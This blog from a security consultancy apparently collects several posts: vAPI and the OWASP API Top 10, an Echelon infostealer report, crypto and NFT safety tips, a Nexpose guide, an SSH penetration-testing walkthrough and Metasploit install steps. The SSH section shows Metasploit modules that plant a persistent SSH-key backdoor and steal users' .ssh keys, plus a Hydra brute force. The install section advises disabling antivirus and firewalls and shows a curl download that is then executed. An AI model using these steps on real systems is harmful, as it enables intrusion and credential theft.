Airzero Sec


Ethical Hacking

Ethical hacking involves an authorized attempt to gain unauthorized access to a computer system, application, or data. Carrying out an ethical hack involves duplicating strategies and actions of malicious attackers.

A tool for simulating OWASP API Top 10 vulnerabilities and observing their behavior has been released to the open-source community.

The vAPI, or 'Vulnerable Adversely Programmed Interface,' is a vulnerability exercise and test platform designed to help users learn about API security.

API security has emerged as a critical area of concern in recent years. APIs are now widely used to manage services and data transfers, and a single broken endpoint can result in data breaches or enterprise network compromises.

According to Gartner, API attacks will become the most common attack vector for enterprise web applications this year.

Vulnerable APIs

vAPI is an open-source PHP-based interface developed by Tushar Kulkarni, a security engineer at Holm Security, and is available on GitHub. It can be run as a self-hosted API using PHP, MySQL, and Postman, or as a Docker image. Kulkarni stated during the platform's introduction at Black Hat Europe 2021 Arsenal that vAPI could help new penetration testers become familiar with how different API bugs are classified, and could also help developers, since the platform lets them see examples of vulnerable code and consider potential mitigations.

The Laravel PHP framework and MySQL are at the heart of the platform's technology stack. At present a Postman collection and environment store the API calls, though this will change with a planned migration to an OpenAPI specification. A manipulator-in-the-middle (MitM) proxy, such as Burp Suite or ZAP, can be used for testing, though the developer does not consider it strictly necessary. "Some API vulnerabilities, such as credential stuffing, may require you to run as an intruder or a ZAP script to solve the challenge," Kulkarni explained.

OWASP API Top 10

In 2019, the Open Web Application Security Project (OWASP) Foundation published its first API Security Top 10 list, which documents the most common API-related causes of security incidents, reflecting the growing importance of API security.

vAPI is currently based on the API categorizations found in the OWASP API Security Top 10.

The following causes are documented in OWASP's 2019 list:

  • API1:2019 Broken Object Level Authorization: exposed endpoints that handle object identifiers without checking ownership
  • API2:2019 Broken User Authentication: failures to implement authentication correctly
  • API3:2019 Excessive Data Exposure: object properties returned to the client that it should not see
  • API4:2019 Lack of Resources and Rate Limiting: no limits on resource sizes or request counts, which degrades performance and allows brute-force attacks
  • API5:2019 Broken Function Level Authorization: inadequate access-control management between functions and roles
  • API6:2019 Mass Assignment: missing filtering of client-supplied properties, enabling malicious object modification
  • API7:2019 Security Misconfiguration: default configurations, verbose errors, and permissive cross-origin resource sharing
  • API8:2019 Injection: SQL, NoSQL, and command injection flaws
  • API9:2019 Improper Assets Management
  • API10:2019 Insufficient Logging and Monitoring
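As an added illustration of two categories from the list above (not vAPI's own code, and written in Python rather than vAPI's PHP): a handler that trusts the object identifier in the request (API1) and one that binds every request field onto the stored record (API6), each beside a hardened version. The user table, handler names and the `role` and `balance` fields are constructed for the example.

```python
from copy import deepcopy

# Constructed in-memory user table standing in for the API's database backend.
SEED_USERS = {
    1: {"id": 1, "email": "alice@example.test", "role": "user", "balance": 100},
    2: {"id": 2, "email": "bob@example.test", "role": "user", "balance": 250},
    3: {"id": 3, "email": "root@example.test", "role": "admin", "balance": 0},
}

# Allow-list of fields a caller may change on their own profile (the API6 fix).
WRITABLE_FIELDS = frozenset({"email"})


class Forbidden(Exception):
    """Caller is authenticated but not authorized for this object."""


def fresh_store():
    """Return an independent copy of the seed data so each run starts clean."""
    return deepcopy(SEED_USERS)


# --- API1:2019 Broken Object Level Authorization ----------------------------
def get_user_vulnerable(users, caller_id, target_id):
    """Returns whichever record the URL names; ownership is never checked."""
    return dict(users[target_id])


def get_user_hardened(users, caller_id, target_id):
    """Returns the record only if the caller owns it or is an admin."""
    if users[caller_id]["role"] != "admin" and caller_id != target_id:
        raise Forbidden(f"user {caller_id} may not read user {target_id}")
    return dict(users[target_id])


# --- API6:2019 Mass Assignment -----------------------------------------------
def update_profile_vulnerable(users, caller_id, payload):
    """Binds every key in the request body straight onto the stored object,
    so {"role": "admin"} or {"balance": 9999} is accepted as-is."""
    users[caller_id].update(payload)
    return dict(users[caller_id])


def update_profile_hardened(users, caller_id, payload):
    """Copies only allow-listed fields; returns the record and the names of
    the rejected fields so the attempt can be logged (API10)."""
    accepted = {k: v for k, v in payload.items() if k in WRITABLE_FIELDS}
    rejected = sorted(k for k in payload if k not in WRITABLE_FIELDS)
    users[caller_id].update(accepted)
    return dict(users[caller_id]), rejected


if __name__ == "__main__":
    store = fresh_store()
    print(get_user_vulnerable(store, 1, 2))  # Bob's record leaks to Alice
    try:
        get_user_hardened(store, 1, 2)
    except Forbidden as exc:
        print("blocked:", exc)
    print(update_profile_vulnerable(fresh_store(), 1, {"role": "admin"}))
    print(update_profile_hardened(fresh_store(), 1,
                                  {"email": "a@example.test", "role": "admin"}))
```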

The platform is now open to the public and free to use. The vAPI roadmap includes a dashboard to track user progress through the API challenges, and Kulkarni hopes that in the long run the platform will become an "open-source playground" where users submit their own API security challenges and scenarios. If you have any doubts about this topic, please do not hesitate to get in touch with us. Airzero Sec will be your digital partner.

Email:[email protected]

Author - Johnson Augustine
Ethical Hacker and Data Security Researcher
Founder: Airo Global Software Inc
LinkedIn Profile: www.linkedin.com/in/johnsontaugustine/

According to researchers, attackers are spreading the Echelon info stealer, which steals credentials for cryptocurrency wallets and other user accounts, using the Telegram handle "Smokes Night."

Attackers are employing the Echelon info stealer to target Telegram users' crypto-wallets in an attempt to swindle new or naïve users of a cryptocurrency discussion channel on the messaging network, according to researchers.

According to a report posted on Thursday, researchers from SafeGuard Cyber's Division Seven threat analysis unit identified a sample of Echelon in a cryptocurrency-focused Telegram channel in October.

The malware used in the campaign is built to steal credentials from a variety of messaging and file-sharing platforms, such as Discord, Edge, FileZilla, OpenVPN, Outlook, and even Telegram itself, as well as from cryptocurrency wallets such as AtomicWallet, BitcoinCore, and ByteCoin.

The operation was "spray and pray," according to the report: "Based on the malware and the way in which it was released, SafeGuard Cyber believes it was not part of a coordinated campaign and was merely targeting new or inexperienced users of the channel."

Researchers determined that the attackers tried to spread Echelon on the channel using the handle "Smokes Night," although it is unclear how successful they were.

"The post seemed not to be a reaction to any of the surrounding posts in the channel," they stated.

Other users on the channel, they note, did not seem to notice anything strange or respond to the message. According to the researchers, this does not mean that the malware did not reach users' devices.

"We did not notice anyone answer to 'Smoke Night' or whine about the file," they said, "but this does not rule out the possibility that channel members were infected."

Cybercriminals have taken advantage of Telegram's popularity and large attack surface by distributing malware on the platform via bots, rogue accounts, and other methods.

Malware Analysis

The Echelon credential stealer was delivered to the cryptocurrency channel via a .RAR file called "present).rar," which contained three files: "pass – 123.txt," a benign text document containing a password; "DotNetZip.dll," a benign library and toolset for manipulating .ZIP files; and "Present.exe," the malicious executable for the Echelon credential stealer.

The .NET payload is obfuscated with the open-source ConfuserEx tool and has two anti-debugging capabilities that promptly terminate the process if a debugger or other malware analysis tools are detected.

Researchers were able to deobfuscate the code and look inside the Echelon sample that was sent to the Telegram channel's subscribers. According to the researchers, they identified domain detection, which implies the sample would try to steal data from any domain that the victim has visited. A detailed list of the platforms the Echelon sample attempted to target is included in the report.

Other capabilities of the malware, according to the researchers, include computer fingerprinting and taking a screenshot of the victim's workstation. The Echelon sample used in the campaign transmits credentials, other stolen data, and screenshots back to a command-and-control server in a compressed .ZIP file.

According to the researchers, Windows Defender detects and deletes the Present.exe malicious executable sample and flags it as '#LowFI: HookwowLow,' protecting users who have the antivirus program from any potential Echelon damage.

For years, Airzero Sec's Cyber Security Consulting experts have worked on a variety of projects for a number of well-known organizations. Use our experience to your advantage, whether to help you get there or to perform technical tests. If you have any doubts about Telegram being used to steal passwords for Bitcoin wallets, please contact us. Airzero Sec will be your digital partner.


Are NFTs Safe Digital Assets?


What Is a Non-Fungible Token?

Non-fungible tokens, or NFTs, are cryptographic assets on a blockchain with unique identification codes and metadata that distinguish them from each other. Unlike cryptocurrencies, they cannot be traded or exchanged at equivalency. This differs from fungible tokens like cryptocurrencies, which are identical to each other and can therefore be used as a medium for commercial transactions.

Are NFTs safe digital assets?

What is an NFT, and why is it becoming such a big topic in the news? NFTs, or non-fungible tokens, are cryptographic tokens that let someone confirm that an online asset is authentic. 2020 was a big year for the crypto world, and the topic of decentralized finance has only grown in popularity, with the likes of Tesla purchasing large quantities of cryptocurrency and Bitcoin reaching all-time highs. NFTs have seen a steady uptick in popularity and use since the end of 2020 and in some cases have sold for millions of dollars.

Cryptocurrencies such as Bitcoin are known as ‘fungible’ tokens because the tokens are interchangeable and not unique. This means that if you were to trade one Bitcoin for another, you’re basically getting the same thing. There is nothing special about each coin. In contrast, non-fungible tokens represent something unique that can’t be replaced. Like trading or selling an original painting that can be verified as authentic, an NFT can be minted for, for example, a particular GIF or photograph as proof that that item is the original. In other words, an NFT is a cryptographic token that permits someone to prove that an online asset is the original. This in turn creates scarcity, which in theory creates value, even in the digital space where things are not tangible.

How to keep your NFTs secure?

The potential value of NFTs naturally raises the question of securing these digital assets. Are they safe to use? In general, buying and holding NFTs is as secure as buying and holding cryptocurrency. But while the technology behind NFTs is considered safe, there are still things you should do to ensure your investment is safe. Here are suggestions for keeping NFTs safe:

  • Use a complex password: Do you find yourself using the same password for different accounts? Stop doing that! A long, unique, complex password is a must for your wallet. Pro tip: this advice applies to every wallet you have.
  • Enable two-factor authentication: As with your cryptocurrency wallet, two-factor authentication goes a long way. By requiring verification before completing actions, it makes an NFT being stolen or accidentally sent to someone far less likely.
  • Keep your recovery phrase in a secure place: If you forget your password, your recovery phrase is your last resort for recovering your account. Make sure that your passphrase is not easily guessable by using a mnemonic phrase, and keep it in a safe location. If you lose your recovery phrase, recovering your account is almost impossible.
  • Back up your wallet regularly: If you suffer a system failure or lose a device, you can have peace of mind that you can retrieve your data. It is a good idea to keep several backups.
  • Update your software regularly: Software updates contain security fixes.
  • Use a secure internet connection: Using shared wifi makes it easier for an attacker to steal your details. If you have to use public wifi, use a VPN to secure your connection and turn off your device’s Bluetooth.

In addition to these steps, one last thing to understand is your legal rights as they pertain to your NFTs. Though NFTs confirm that a particular piece of data is unique, they do not stop someone from tokenizing something that is not theirs. Fortunately, there are legal protections you have access to. Standard copyright law applies to NFTs. If, for example, you found that your digital art was being stolen, you could file a takedown notice against the platform selling these NFTs and their creators under the Digital Millennium Copyright Act.

Coindesk also suggests that one specify what is being sold to buyers. If you own the rights to a work you’re selling, are you transferring ownership of the underlying art or just the digital representation? Be specific up front, where feasible, by structuring your smart contract to spell out the rights being transferred.

If you have any doubt about how to keep NFTs secure, don’t hesitate to contact us through the given email. Airzero Sec will be your digital partner.


Bitcoin is on another rollercoaster ride. Over the preceding few months, the cryptocurrency's price spiked from $3,000 to over $13,000; at this writing, it sits near $10,000.

Such conditions prompt people to buy bitcoins with the expectation of coming out ahead. But Bitcoin's rising price also draws malicious hackers who see an opportunity to take the funds of unwary users who don't know the basics of Bitcoin security.

If you're new to Bitcoin, these suggestions will help you protect your digital fortune.

Protect Your Online Wallet

The easiest way to get started with Bitcoin and other popular cryptocurrencies is to sign up with an online wallet such as Coinbase or Binance. Online wallets hide several of Bitcoin's technical difficulties, such as managing private keys and addresses, so they're an attractive option for people who are less tech-savvy or new to Bitcoin. Signing up for the largest online wallets takes no more than a few minutes, and accessing your account needs only a browser, username, and password.

Online wallets, however, are not the safest place to store your cryptocurrencies. Anyone with your email and password can log in and steal your coins, and bad actors can obtain these with something as simple as a phishing email. Also, unlike with popular payment systems, recovering lost bitcoins is practically impossible.

Here are a few best practices that can increase your wallet's security:

Enable Two-Factor Authentication (2FA)

Most online wallets support some form of two-factor or multi-factor authentication. Enabling 2FA links your account to a phone, mobile app, or physical dongle. If a malicious hacker gets your username and password, they'll still need that second factor to access your account.

Don't Use Your Phone Number for 2FA

Most sites support various forms of two-factor authentication, but not all 2FA methods are equally reliable. If you rely on SMS passcodes to secure your account, resourceful hackers may be able to hijack your phone number and intercept your 2FA passcode. If you're linking a phone number to your account, it is best to use a separate, private SIM card.

Use a Separate Email for Your Bitcoin Wallet

Most of us have a primary email account for our daily interactions, and we use the same address for our Facebook, Twitter, and PayPal accounts. We share it with friends, family members, and coworkers. They might share it with other people, and eventually a malicious hacker might get it. If your online wallet is tied to this email, the hacker has one of the two pieces of data required to access your wallet. Use a separate email address for your online wallet, one you don't use for any other purpose. This minimizes the chance of your account being compromised by a cybercriminal.

Use an Offline Wallet

Every Bitcoin wallet has one or more "addresses" where it stores its cryptocurrency. Bitcoin addresses are long, unique strings of alphanumeric characters, and each address has a pair of private and public encryption keys. When other users want to transfer bitcoins to your address, they use your public key. When you want to spend your bitcoins, you use the private key to sign your transaction. The private key proves that you own the bitcoins stored at a specific address. Therefore, the key to securing bitcoins is to keep your private key in a secure place.

By using an online wallet, you're effectively letting the service provider hold your private keys for you. That's why online wallets are so easy to use. But it also makes online wallets an attractive target for hackers. Although these companies do their best to protect user accounts, they get breached fairly often.

An alternative to online Bitcoin wallets is offline wallets, which give you full control of your private keys and protect you against mass data breaches at Bitcoin services. The trade-off is that they're more complicated to set up and use, and they need more technical knowledge. Offline wallets come in several flavours:

Software Wallets

Software wallets are applications you can install on your computer, laptop or mobile device. A wallet app such as Electrum stores private keys on your machine and uses them to sign Bitcoin transactions whenever you need to make a payment. If you want full security with a software wallet, install it on a machine that isn't connected to the internet and transfer the signed transactions to an internet-connected machine. The process is more complicated but also more secure.

Hardware Wallets

Hardware wallets are dedicated devices that generate and store cryptocurrency key pairs. They normally come with an associated app you must install on your computer or mobile device. When you want to transfer bitcoins to someone, you connect the hardware wallet to your computer or pair it with your phone via Bluetooth. Every transaction is signed on the hardware wallet with the user's confirmation. Hardware wallets are very secure because the private keys never leave the device; Trezor and Ledger are two options.

Paper Wallets

Paper wallets are Bitcoin key pairs printed as QR codes on paper. You can generate paper wallets at one of various websites such as bitcoinpaperwallet.com. To receive funds in your paper wallet, scan the public key with any Bitcoin wallet app and give it to the payer. To send bitcoins from your paper wallet, scan your private key to sign your transaction.

Paper wallets are "cold storage," which means they're great for securely storing bitcoins but not very practical for day-to-day payments. Paper wallets are safe because they have no digital component and can't be stolen or hacked remotely. But you must destroy the digital copy of the wallet after you print it, to make sure no one else replicates it.

Using an offline wallet doesn't mean your bitcoins are completely safe. If you keep your private keys in an unsecured place, the wrong person might chance upon them. Also, you might unintentionally lose your keys, which will also mean losing your funds with no recourse. For instance, if you lose or damage your hardware or paper wallet or forget your security PIN, your bitcoins will be lost forever.

If you have any doubt about how to keep your Bitcoin safe, don’t hesitate to contact us through the given email. Airzero Sec will be your digital solution.



In this blog, we’ll explore Nexpose, a network vulnerability scanner. There are many vulnerability scanners, but what sets Nexpose apart is its smooth user interface and the robust reporting options it offers, from the most basic to the advanced.

Introduction to Nexpose

Nexpose is one of the best vulnerability assessment tools. It works across physical, virtual, cloud and mobile environments to discover the active services, open ports, and running applications on each device, and it identifies vulnerabilities that may exist based on the characteristics of the known services and applications. Nexpose presents the results in scan reports, which help prioritize the vulnerabilities by risk and determine the most effective remediation.

Which are the Important Nexpose terminologies?

  • Assets – A host on a network
  • Site – A logical group of assets that has a dedicated scan engine
  • Scan Template – A template that defines the audit level Nexpose uses to perform a vulnerability scan
  • Local Scan Engine – Scan Engines are responsible for performing scan jobs on your assets

How do we install Nexpose Virtual Appliance?

Let’s begin the Nexpose installation on our virtual machine. We have already downloaded the Nexpose VM. First, we’ll open Nexpose in VMware Workstation and power it on. As soon as it boots up, we’ll see the default login credentials, username and password. We then have to set a new password that meets the password requirements.

Afterward, use the ifconfig command in the Nexpose VM to find the appliance’s IP address so that we can log into Nexpose’s web interface.

Now, with the IP in hand, we browse to it over HTTPS on port 3780, Nexpose’s default port.

URL : https://<Nexpose_IP>:3780

We’ll be greeted with a warning about the security certificate, so to use Nexpose we have to get past this notice: click Advanced, then Accept the Risk and Continue.

You will then be redirected to a login page; enter the default username and password.

Next, you’ll be asked for an activation key; provide the license key that you received at your email address.

As soon as you’ve logged in and completed all the necessary activations, the Nexpose Security Console web page will load and we’ll be ready to run a scan.

How do we Run Vulnerability Scans?

To begin a new scan, go to the home page, click the Create dropdown, and select Site. The Security Console will present the “Site Configuration” screen.

On the General tab, we have to name and describe our site. We can also set its importance from Very Low to Very High.

The Assets configuration page contains two sections: Include and Exclude. In the Authentication section, if we need to add any credentials, we can do so here. Basically, we perform a credentialed scan by providing the scanner with a username and a password.

Next, choose a Scan Template; we’ve used the default Scan Template, i.e. Full audit without Web Spider.

Now we have to choose an engine for our scan; we’re choosing the Local Scan Engine. We have now provided all the information necessary to set up our site for a scan. To start scanning, press the Save and Scan button at the top right corner of the Nexpose console.

Once the scan is finished, the result summarizes the number of vulnerabilities discovered, the risk score, and the duration of the scan.

How do we Generate Reports?

Now we can create a new report in the Reports tab by simply giving it a title and choosing the scan, the report template and the format in which we want our report.

If you have any doubts about the Nexpose installation and services, don't hesitate to contact us through the email given above. Airzero Sec will be your digital partner.



Scanning every open port is essentially the first step attackers take to prepare their attack. To operate a service, one has to keep its port open, yet that raises the fear of attackers. Therefore, one must learn to defend ports even when they are open. In this post, we will cover penetration testing of SSH, also known as Secure Shell.

The SSH protocol, also known as Secure Shell, is a method for secure remote login from one computer to another. It provides several options for strong authentication and protects the confidentiality and integrity of communications with strong encryption. It is a secure alternative to unprotected login protocols and insecure file transfer methods.

How do we install SSH?

It is very simple to install and configure the SSH service; we can quickly install it using the openssh-server package from the Ubuntu repository. To install any service you must have a root-privileged account; then run the command below.

apt install openssh-server

When you run the above command it will download the package and install it with the default configuration on the host machine.

How do we do SSH port scanning?

If you don’t have direct access to the host machine, use Nmap to remotely identify the port state, which is considered the first step of a penetration test. Here we’re using Kali Linux to conduct the penetration test.

So, to identify an open port on a remote host, we will use an Nmap version scan that will not only identify an open port but will also perform banner grabbing that shows the version of the running service.

nmap -sV -p22 192.168.1.103

What are the methods to connect SSH?

Terminal Command (Linux)

Now run the following command to access the SSH shell of the remote machine as an authorized user. Username: ignite Password: 123

ssh ignite@192.168.1.103

Putty (Windows)

  • Step 1: Download putty.exe and run it, then enter the host IP address <192.168.1.103> and port <22>, and set the connection type to SSH.
  • Step 2: To establish a connection between the client and the server, a PuTTY session will be opened that requires login credentials. Username: ignite Password: 123

How to do port redirection testing?

Thus, when we ran the scan against port 22, it reported the port state as CLOSED for ssh, whereas port 2222 was reported OPEN for ssh, as can be seen in the scan output.

How to establish an SSH connection using an RSA key?

Passwords alone are not a strong way to protect access to the server, because a brute-force attack can break them. That’s why you need an additional protection method to defend the SSH server. SSH key pairs are another important way to authenticate clients to the server. A key pair consists of two long strings of characters: a public key and a private key. You place the public key on the server and the private key on the client machine, and the server grants access by verifying the client machine’s private key. Once the keys match up, the system lets you establish an SSH session automatically without typing a password.

ssh-keygen is a tool for generating new authentication key pairs for SSH. Such key pairs are used for automating logins, single sign-on, and authenticating hosts. We will follow these steps to generate a key pair for an authenticated connection.

  • Step 1: Run the following command to create an SSH key pair on the host machine (Ubuntu).

    ssh-keygen

  • Step 2: Do the same on the client machine that is allowed to connect to the host machine.

  • Step 3: Once the SSH key pair has been created, copy id_rsa.pub into authorized_keys.

    ssh-keygen
    cd .ssh
    ls
    cat id_rsa.pub > authorized_keys

  • Step 4: Copy the authorized_keys file to the host machine, placing it in the .ssh directory.

  • Step 5: Edit sshd_config inside /etc/ssh using an editor.

    nano /etc/ssh/sshd_config

  • Step 6: Uncomment the “PasswordAuthentication no” line. As a result, only a client holding an authorized RSA key can connect to the host machine, without using a password.

Now if you try to connect to the SSH server with just a username and password, the server will refuse the connection, because it only accepts requests that present an authorized key.

  • Step 7: Copy the id_rsa key from Kali Linux to the Windows machine, to connect from Windows using the authorized key.

  • Step 8: Download puttygen.exe.

  • Step 9: Run puttygen.exe, load id_rsa and “save as key”, naming it Key.

  • Step 10: Use putty.exe to connect to the host machine by entering hostname 192.168.1.103 and port 22.

  • Step 11: Go to SSH > Auth and browse to the private key that you saved in step 9.
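Steps 5 and 6 only work if sshd actually applies `PasswordAuthentication no`. The following added example (not from the original post) audits an sshd_config for the key-only settings those steps aim for, reproducing two rules from sshd_config(5): the first value seen for a keyword wins, and lines after a `Match` block apply only to matching connections. The two sample configurations are constructed.

```python
import re

# Effective OpenSSH defaults for the directives the post touches (sshd_config(5)).
DEFAULTS = {
    "passwordauthentication": "yes",
    "pubkeyauthentication": "yes",
    "permitemptypasswords": "no",
}

# The key-only policy that steps 5 and 6 are meant to produce.
REQUIRED = {
    "passwordauthentication": "no",
    "pubkeyauthentication": "yes",
    "permitemptypasswords": "no",
}


def parse_sshd_config(text):
    """Map each keyword (lower-cased) to its effective global value.

    Blank lines and lines starting with '#' are comments, keywords are
    case-insensitive, 'Keyword value' and 'Keyword=value' are both accepted,
    the FIRST value seen wins, and everything after a 'Match' line is scoped
    to matching connections, so it is skipped for the global policy."""
    effective = {}
    in_match_block = False
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = re.split(r"[\s=]+", line, maxsplit=1)
        key = parts[0].lower()
        value = parts[1].strip().lower() if len(parts) > 1 else ""
        if key == "match":
            in_match_block = True
            continue
        if in_match_block:
            continue
        effective.setdefault(key, value)  # first occurrence wins
    return effective


def audit_sshd_config(text):
    """Return sorted findings; an empty list means the config is key-only."""
    effective = parse_sshd_config(text)
    findings = []
    for key, wanted in REQUIRED.items():
        actual = effective.get(key, DEFAULTS[key])
        if actual != wanted:
            findings.append(f"{key} is '{actual}' (want '{wanted}')")
    return sorted(findings)


# Constructed sample: the hardened line was appended at the bottom, but the
# earlier 'yes' is read first and wins, so password logins stay enabled.
SAMPLE_WRONG = """\
Port 22
PasswordAuthentication yes
#PubkeyAuthentication yes
PasswordAuthentication no
"""

# Constructed sample: the global policy is key-only; the Match block's
# exception for one user does not change the global result.
SAMPLE_RIGHT = """\
Port 22
PasswordAuthentication no
PubkeyAuthentication yes
PermitEmptyPasswords no
Match User backup
    PasswordAuthentication yes
"""

if __name__ == "__main__":
    print("wrong:", audit_sshd_config(SAMPLE_WRONG))
    print("right:", audit_sshd_config(SAMPLE_RIGHT))
```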

How to exploit SSH with Metasploit?

SSH Key Persistence - Post Exploitation:
Suppose that, having compromised the host machine, you have obtained a meterpreter session and want to leave a persistent backdoor that will give you a reverse connection next time.

This can be accomplished with the Metasploit post-exploitation module “SSH Key Persistence” when port 22 is open on the host machine. This module adds an SSH key to a specified user, to allow future login to the victim via SSH at any time.

use post/linux/manage/sshkey_persistence
msf post(sshkey_persistence) > set session 1
msf post(sshkey_persistence) > exploit

We verify this by connecting to the host machine via port 22 using the private key created above. Here I have renamed the private key to “key” and given it permission 600.

chmod 600 key
ssh -i key ignite@192.168.1.103

Stealing the SSH key

Suppose that, having compromised the host machine, you have a meterpreter session, port 22 is open for SSH, and you want to obtain the SSH public key and authorized key. This can be done with the Metasploit post-exploitation module “Multi Gather OpenSSH PKI Credentials Collection”, as shown below.

This module collects the contents of all users’ .ssh directories on the targeted machine. Additionally, known_hosts, authorized_keys and other files are also downloaded. This module is largely based on firefox_creds.rb.

use post/multi/gather/ssh_creds
msf post(ssh_creds) > set session 1
msf post(ssh_creds) > exploit

The authorized keys from the target’s /home/ignite/.ssh folder are stored on our local machine under /root/.msf4/loot; these keys can now be used to log in to the SSH server.

We verify this by connecting to the host machine via port 22 using the private key downloaded above. First, change the permissions of the RSA key, using the commands below.

chmod 600 key
ssh -i key ignite@192.168.1.103

SSH login using pubkey

Suppose you have the id_rsa key of the host machine and want to obtain a meterpreter session via Metasploit; this can be accomplished with the following module.

This module will test SSH logins on a range of machines using a defined private key file and report successful logins. If you have loaded a database plugin and connected to a database, this module will record successful logins and hosts so you can track your access. Key files may be a single private key or several private keys in a specified directory.

use auxiliary/scanner/ssh/ssh_login_pubkey
auxiliary(scanner/ssh/ssh_login_pubkey) > set rhosts 192.168.1.103
auxiliary(scanner/ssh/ssh_login_pubkey) > set username ignite
auxiliary(scanner/ssh/ssh_login_pubkey) > set key_path /root/.ssh/id_rsa
auxiliary(scanner/ssh/ssh_login_pubkey) > exploit

This will open a command shell session, which can be upgraded to a meterpreter session with the following command.

sessions -u 1

How do we do SSH password cracking?

We can perform a brute-force attack on SSH to guess the password or to test the lockout policy while penetration testing SSH. It needs a dictionary for the username list and the password list; here we have a username file “user.txt” and a password file named “pass.txt” for the brute-force attack with the help of Hydra.

hydra -L user.txt -P pass.txt 192.168.1.103 ssh

As a result, you can see that the host has no protection against brute force attacks, and we were able to obtain valid SSH credentials.

To protect your server against brute force attacks you can use fail2ban, which is an IPS: it watches the SSH authentication log and bans a source address after a set number of failures within a time window.
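The detection logic fail2ban applies to the sshd log, shown here as an added example that is not fail2ban's own code and not part of the original post. The log lines are constructed, and the thresholds are assumptions that mirror fail2ban's defaults (maxretry=5, findtime=600 seconds): a source that fails five times inside ten minutes is reported, while a slow, spread-out guesser is not.

```python
"""Spot SSH password guessing in the auth log the way fail2ban's sshd jail does:
`maxretry` failures from one IP inside a `findtime`-second window.

Added example; not fail2ban's code. Log lines are constructed; the thresholds
are assumptions that mirror fail2ban's defaults."""
import re
from collections import defaultdict, deque
from datetime import datetime

# OpenSSH writes one of these lines per failed password attempt.
FAILED_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2} +\d{1,2} \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"Failed password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>\d{1,3}(?:\.\d{1,3}){3}) port \d+ ssh2"
)

# Constructed sample: one client hammering the service, one guessing slowly.
SAMPLE_LOG = """\
Nov 12 10:00:01 web sshd[1201]: Failed password for invalid user admin from 192.0.2.10 port 50122 ssh2
Nov 12 10:00:03 web sshd[1203]: Failed password for invalid user admin from 192.0.2.10 port 50124 ssh2
Nov 12 10:00:05 web sshd[1205]: Failed password for ignite from 192.0.2.10 port 50126 ssh2
Nov 12 10:00:07 web sshd[1207]: Failed password for ignite from 192.0.2.10 port 50128 ssh2
Nov 12 10:00:09 web sshd[1209]: Failed password for ignite from 192.0.2.10 port 50130 ssh2
Nov 12 10:00:11 web sshd[1211]: Accepted password for ignite from 192.0.2.10 port 50132 ssh2
Nov 12 10:15:00 web sshd[1300]: Failed password for ignite from 198.51.100.7 port 40001 ssh2
Nov 12 10:30:00 web sshd[1301]: Failed password for ignite from 198.51.100.7 port 40002 ssh2
Nov 12 10:45:00 web sshd[1302]: Failed password for ignite from 198.51.100.7 port 40003 ssh2
Nov 12 11:00:00 web sshd[1303]: Failed password for ignite from 198.51.100.7 port 40004 ssh2
Nov 12 11:15:00 web sshd[1304]: Failed password for ignite from 198.51.100.7 port 40005 ssh2
Nov 12 11:30:00 web sshd[1305]: Failed password for ignite from 198.51.100.7 port 40006 ssh2
"""


def parse_ts(stamp, year=2021):
    """syslog timestamps carry no year; assume one so window arithmetic works."""
    return datetime.strptime(f"{year} {stamp}", "%Y %b %d %H:%M:%S")


def failures_by_ip(lines):
    """Total failed password attempts per source IP, ignoring time."""
    counts = defaultdict(int)
    for line in lines:
        m = FAILED_RE.match(line)
        if m:
            counts[m["ip"]] += 1
    return dict(counts)


def find_brute_forcers(lines, maxretry=5, findtime=600):
    """Return {ip: timestamp of the failure that crossed the threshold} for each
    IP that produced `maxretry` failures inside some `findtime`-second window."""
    recent = defaultdict(deque)   # ip -> failure timestamps still inside the window
    tripped = {}
    for line in lines:
        m = FAILED_RE.match(line)
        if not m:
            continue              # successful logins and other noise are ignored
        ip, ts = m["ip"], parse_ts(m["ts"])
        window = recent[ip]
        window.append(ts)
        while (ts - window[0]).total_seconds() > findtime:
            window.popleft()      # forget failures older than findtime
        if len(window) >= maxretry and ip not in tripped:
            tripped[ip] = ts
    return tripped


if __name__ == "__main__":
    for ip, when in find_brute_forcers(SAMPLE_LOG.splitlines()).items():
        print(f"ban candidate {ip}: first tripped at {when:%H:%M:%S}")
```

With the defaults only 192.0.2.10 is reported; 198.51.100.7 makes six failures in total but never five inside one ten-minute window, which is exactly the gap a low-and-slow guesser relies on and why a longer findtime or a lower maxretry is worth considering for exposed hosts.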

If you have any doubts about this topic, or need advice and the best services and consultation about SSH installation and its capabilities, feel free to contact us. AIRZERO SEC will be your strong digital solution. Email id: [email protected]


Author - Johnson Augustine
Ethical Hacker and Data Security Researcher
Founder: Airo Global Software Inc
LinkedIn Profile: www.linkedin.com/in/johnsontaugustine/


Rapid7 provides open-source installers for the Metasploit Framework on Linux, Windows, and OS X operating systems. The Metasploit installer ships with all the dependencies required to run the Metasploit Framework. It includes msfconsole and installs associated tools like John the Ripper and Nmap.

How to disable antivirus software?

Anti-virus software detects the Metasploit Framework as malicious and may cause problems with the installation and runtime of the Metasploit Framework. The Metasploit Framework exploits the same vulnerabilities that the anti-virus software detects. Therefore, when you install the Metasploit Framework, the anti-virus software interrupts the installation process and alerts you to the security risks that may infect the system.

If you intend to use the Metasploit Framework, you should disable any anti-virus software before you install the Metasploit Framework. If you cannot disable the anti-virus software, you must exclude the Metasploit directory from the scan.

How to disable firewalls?

Local firewalls, including Windows Firewall, interfere with the execution of exploits and payloads. If you install the Metasploit Framework from behind a firewall, the firewall may detect the Metasploit Framework as malware and block the download. Please disable the local firewalls before you install or run the Metasploit Framework. If you must operate from behind a firewall, you should download the Metasploit Framework from outside the network.

How to obtain administrator privileges?

To install the Metasploit Framework, you need administrator privileges on the system that you want to use to run the framework.

How to install the Metasploit framework on windows?

  • Download the Windows installer.
  • After you download the installer, locate the file and double-click the installer icon to start the installation process.
  • When the Setup screen appears, select Next to continue.
  • Read the license agreement and choose the "I accept the license agreement" option. Select Next to continue.
  • Browse to the location where you want to install the Metasploit Framework. By default, the framework is installed in the C:\Metasploit-framework folder. Select Next to continue.
  • Select Install.
  • The installation process can take 5-10 minutes to complete. When the installation completes, click the Finish button.
  • To launch msfconsole after the installation completes, run the following from the command line:

    $ msfconsole.bat

How to install the Metasploit framework on Linux?

  • Open the terminal.
  • Type the command to add the build repository and enable the Metasploit Framework package:

    curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && chmod 755 msfinstall && ./msfinstall

